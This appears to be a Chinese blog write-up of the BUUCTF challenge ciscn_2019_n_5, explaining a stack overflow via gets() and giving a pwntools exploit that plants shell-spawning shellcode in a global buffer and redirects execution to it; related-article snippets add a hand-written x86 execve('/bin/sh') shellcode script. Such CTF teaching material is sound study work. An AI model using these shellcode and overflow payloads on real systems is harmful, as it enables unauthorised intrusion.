BUUCTF-ciscn_2019_n_51

栈溢出攻击
最新推荐文章于 2025-02-20 15:35:52 发布
原创 最新推荐文章于 2025-02-20 15:35:52 发布 · 489 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了一个利用栈溢出漏洞获取系统权限的过程。通过分析未开启保护的程序,找到gets()函数溢出点,并构造payload发送shellcode,最终实现getshell。使用Python编写了exploit脚本。

0x1 checksec

没有开启保护,有可写segments,考虑shellcode

0x2 IDA 

1.main

gets()函数溢出点

 

偏移量

栈溢出到shellcode,getshell 

0x3 EXP

from pwn import *
context.log_level="debug"
p=remote("node4.buuoj.cn",29553)

context.arch="amd64"
shellcode=asm(shellcraft.sh())

name=0x601080
p.recvuntil("name\n")

p.sendline(shellcode)

p.recvuntil("?\n")
payload="A"*0x28+p64(name)

p.sendline(payload)


p.interactive()

[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 1151
[buuctf]ciscn_2019_n_5
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 836
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1942
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUUCTF-ciscn_2019_ne_51
Rt1Text的博客
10-09 420
根据文件名可知是other shellcode。
[BUUCTF]PWN5——ciscn_2019_n_1
mcmuyanga的博客
08-25 2604
[BUUCTF]4——ciscn_2019_n_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_1 步骤: 例行检查,64位,开启了nx保护 nc一下看看输入点的字符串,看运行结果猜测是一个猜数的程序,而且需要我们猜的数应该是11.28125 输入11.28125,发现还是不对 用64位ida打开,首先shift+f12查看程序里的字符串,发现了 “ cat /flag ” 双击跟进,ctrl+x找到调用这个字符串的函数 我们可以看到第10行的if
buuctf_ciscn_2019_n_5
2301_81060697的博客
02-20 423
buuctf
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 692
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
buuctf--ciscn_2019_c_1
2301_81060697的博客
02-20 847
获取libc库构造rop链
BUUCTFciscn_2019_n_1
2201_75556700的博客
11-29 467
4、看到调用了func函数,双击查看,用到了gets函数,存在栈溢出,这里需要判断v2的值等于11.28125,才会执行脚本。3、使用64位的ida分析,找到main函数,F5反汇编。题目二:【BUUCTFciscn_2019_n_1。v1数组大小:44字节(0x30-0x04)2、下载附件在kali中分析。
BUUCTF PWN wp--ciscn_2019_n_1
2302_81740139的博客
08-25 478
得到gets缓冲区的范围大小。用垃圾数据填充v1(如上图箭头为0x30+0x8),溢出v2,覆盖到下方的system函数,转换到cat/flag的地址0x4006BE。第二步 进入主函数,发现func,main函数调用了func,func中存在经典gets()漏洞,我们看到本题是v2数组在做比较。第一步 checksec,并检查该题的保护机制。第三步 编写脚本。
buuctf ciscn_2019_n_5
qq_53912227的博客
02-15 260
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3330
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 592
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
ciscn_2019_n_5
、moddemod
06-17 448
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
【CTF】ciscn_2019_n_5
凉水的博客
04-22 1139
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
[CISCN 2019华北] PWN5(ciscn_2019_n_5) 复现
Xzzzz911的博客
09-05 2186
此题我认为需要认真分析伪代码,发现其漏洞和一些重要信息,并且需要了解怎么构造shellcode和构造rop执行流,这些都是比较基础的知识点,最后 法二 和 法三 构造exp有些不同点,可以尝试对比一下,你应该会收获不少(上述为个人看法,如有不对,希望各位师傅指正)
BUUCTF-others_shellcode
最新发布
03-26
### BUUCTF Others Shellcode 题目解题思路 BUUCTF中的`Others_Shellcode`是一道典型的PWN类题目,主要考察选手对于Shellcode编写以及Linux环境下的漏洞利用能力。以下是关于该题目的核心解题思路: #### 一、题目背景与目标 此题目提供了一个可执行程序文件,其功能是读取用户输入并尝试运行特定指令。然而,由于存在某些安全机制未启用(如NX位关闭),攻击者可以注入自定义的Shellcode来实现任意命令执行。 通过分析可知,目标是要构造一段能够绕过现有防护措施的有效载荷(shellcode),最终达到获取flag的目的[^1]。 #### 二、具体技术细节解析 1. **逆向工程** 使用工具如Ghidra或者Radare2对给定二进制文件进行静态反汇编分析,确认入口点函数逻辑及其调用链路情况;同时也要注意查看是否有其他隐藏的功能模块被触发的可能性。 2. **确定ROP Gadget** 如果发现保护机制开启了部分控制流完整性验证,则可能需要用到Return-Oriented Programming (ROP) 技巧构建新的执行流程路径。这一步骤涉及查找合适的gadgets组合形成所需的系统调用序列。 3. **编写Shellcode** 基于上述准备好的信息,按照实际需求定制化设计payload内容。考虑到不同架构下寄存器分配规则差异等因素,在撰写过程中需格外小心处理字节顺序等问题以免引起错误行为发生。 4. **测试与调试** 利用QEMU模拟真实机器环境下多次试验调整直至成功完成挑战为止。期间还可以借助strace跟踪进程活动状况以便更好地理解整个交互过程的工作原理。 ```python from pwn import * context.arch = 'i386' shellcode = asm(''' xor eax, eax # 清零EAX 寄存器 push eax # 将 NULL 推入堆栈作为字符串终止符 # 此处创建 "/bin/sh\x00" 的一部分 push 0x68732f6e # hs/n push 0x69622f2f # ib// mov ebx, esp # EBX -> 参数1: 文件名指针 ("//bin/sh") cdq # EDX <- EAX 扩展成双字长形式 (清零EDX) # DX 是第二个参数,这里不需要设置任何东西 mov ecx, edx # ECX <- 第三个参数也是NULL mov al, 0xb # AL 设置为syscall编号 execve() int 0x80 # 发起中断请求操作系统服务 ''') p = process('./vuln') p.sendline(shellcode) log.success(f'Shellcode Sent! Waiting for shell...') p.interactive() ``` 以上脚本展示了如何生成适用于Intel x86体系结构的一个简单execve("/bin/sh", ...) 调用样例,并发送至服务器端等待响应。 --- ###
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值